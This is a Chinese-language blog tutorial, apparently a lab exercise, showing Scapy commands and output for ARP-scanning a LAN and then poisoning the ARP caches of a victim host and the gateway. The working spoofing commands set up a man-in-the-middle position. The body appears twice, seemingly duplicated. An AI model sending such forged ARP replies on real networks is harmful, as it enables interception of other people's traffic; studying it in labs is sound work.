Scapy交互式arp扫描与攻击
2018-03-17 10:58
295 查看
1、局域网Arp扫描:
1) 简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)
>>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Beginemission:
***Finishedto send 256 packets.
................................................^C(复杂实现定义什么时候停止)
Received51 packets, got 3 answers, remaining 253 packets
>>>print(arp2[0].show())
0000Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether /ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03says 192.168.80.251 / Padding
2) 拆开看数据包192.168.80.251的字段:
>>>print(arp2[0].res[2][1].fields)(复杂实现查看字段自动提取)
{'src':'00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}
>>>print(arp2[0].res[2][1].show())(复杂实现查看字段自动提取)
###[Ethernet ]###
dst= 00:0c:29:e2:bb:15
src= 00:0c:29:21:fd:03
type= 0x806
###[ ARP]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:21:fd:03
psrc= 192.168.80.251
hwdst= 00:0c:29:e2:bb:15
pdst= 192.168.80.250
###[Padding ]###
load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
None
2、ARP spoof(arp毒化)
1)毒化192.168.80.251主机(告诉它网关mac是攻击者的mac地址):
192.168.80.1 mac地址为00:50:56:c0:00:08(网关)
192.168.80.250 mac地址为00:0c:29:e2:bb:15(攻击者)
192.168.80.251 mac地址为00:0c:29:21:fd:03(被攻击者)
>>>arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
>>> arp3.show()
###[Ethernet ]###
dst= 00:0c:29:21:fd:03
src= '00:0c:29:e2:bb:15'
type= 0x806
###[ ARP]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.1
hwdst= 00:0c:29:21:fd:03
pdst= 192.168.80.251
>>>arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Beginemission:
Finishedto send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets
由于arp为二层包只要目的mac正确就可以发送,192.168.80.251接收到arp回复报文只读取ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.1'放入自己arp缓存中。
截图:
毒化前192.168.80.251 arp 缓存:
毒化后192.168.80.251 arp 缓存:
3) 毒化网关(告诉网关192.168.80.1主机192.168.80.251mac地址为攻击者mac):
>>>arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
>>> arp4.show()
###[Ethernet ]###
dst= 00:50:56:c0:00:08
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.251
hwdst= 00:50:56:c0:00:08
pdst= 192.168.80.1
>>>arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Beginemission:
Finishedto send 1 packets.
........^C
Received8 packets, got 0 answers, remaining 1 packets
由于arp为二层包只要目的mac正确就可以发送,192.168.80.1接收到arp回复报文只读取 ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.251'放入自己arp缓存中。
截图:
毒化前192.168.80.1 arp 缓存:
毒化后192.168.80.1 arp 缓存:
1) 简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)
>>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Beginemission:
***Finishedto send 256 packets.
................................................^C(复杂实现定义什么时候停止)
Received51 packets, got 3 answers, remaining 253 packets
>>>print(arp2[0].show())
0000Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether /ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03says 192.168.80.251 / Padding
2) 拆开看数据包192.168.80.251的字段:
>>>print(arp2[0].res[2][1].fields)(复杂实现查看字段自动提取)
{'src':'00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}
>>>print(arp2[0].res[2][1].show())(复杂实现查看字段自动提取)
###[Ethernet ]###
dst= 00:0c:29:e2:bb:15
src= 00:0c:29:21:fd:03
type= 0x806
###[ ARP]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:21:fd:03
psrc= 192.168.80.251
hwdst= 00:0c:29:e2:bb:15
pdst= 192.168.80.250
###[Padding ]###
load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
None
2、ARP spoof(arp毒化)
1)毒化192.168.80.251主机(告诉它网关mac是攻击者的mac地址):
192.168.80.1 mac地址为00:50:56:c0:00:08(网关)
192.168.80.250 mac地址为00:0c:29:e2:bb:15(攻击者)
192.168.80.251 mac地址为00:0c:29:21:fd:03(被攻击者)
>>>arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
>>> arp3.show()
###[Ethernet ]###
dst= 00:0c:29:21:fd:03
src= '00:0c:29:e2:bb:15'
type= 0x806
###[ ARP]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.1
hwdst= 00:0c:29:21:fd:03
pdst= 192.168.80.251
>>>arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Beginemission:
Finishedto send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets
由于arp为二层包只要目的mac正确就可以发送,192.168.80.251接收到arp回复报文只读取ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.1'放入自己arp缓存中。
截图:
毒化前192.168.80.251 arp 缓存:
毒化后192.168.80.251 arp 缓存:
3) 毒化网关(告诉网关192.168.80.1主机192.168.80.251mac地址为攻击者mac):
>>>arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
>>> arp4.show()
###[Ethernet ]###
dst= 00:50:56:c0:00:08
src= 00:0c:29:e2:bb:15
type= 0x806
###[ ARP]###
hwtype= 0x1
ptype= 0x800
hwlen= 6
plen= 4
op= is-at
hwsrc= 00:0c:29:e2:bb:15
psrc= 192.168.80.251
hwdst= 00:50:56:c0:00:08
pdst= 192.168.80.1
>>>arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Beginemission:
Finishedto send 1 packets.
........^C
Received8 packets, got 0 answers, remaining 1 packets
由于arp为二层包只要目的mac正确就可以发送,192.168.80.1接收到arp回复报文只读取 ARP报文中的hwsrc=''00:0c:29:e2:bb:15'与psrc='192.168.80.251'放入自己arp缓存中。
截图:
毒化前192.168.80.1 arp 缓存:
毒化后192.168.80.1 arp 缓存:
相关文章推荐
- Scapy交互式arp扫描与攻击
- ARP扫描攻击(JAVA实现)
- python 使用scapy进行ARP扫描
- scapy实现arp 毒化攻击
- Scapy,IPTables,Brupsuite在ARP毒化攻击中的实用性技巧
- python_scapy实现ARP扫描
- ARP攻击原理及解决方法(NBTSCAN扫描工具下载和nbtscan使用方法)
- 血与泪的经验:服务器ARP的欺骗攻击与防范
- ARP攻击故障解析
- ARP缓存表的构成ARP协议全面实战协议详解、攻击与防御
- ARP的攻击与防护
- 校园网arp攻击防御
- [转]了解ARP的攻击原理 阻止ARP攻击
- 端口扫描攻击
- 断网攻击,linux,arp
- Python Scapy ARP
- SSL/TLS 受诫礼(BAR-MITZVAH)攻击漏洞(CVE-2015-2808)【原理扫描】
- 正确安全防护 摆脱不请自来的黑客扫描与攻击
- 基于ARP的网络扫描工具netdiscover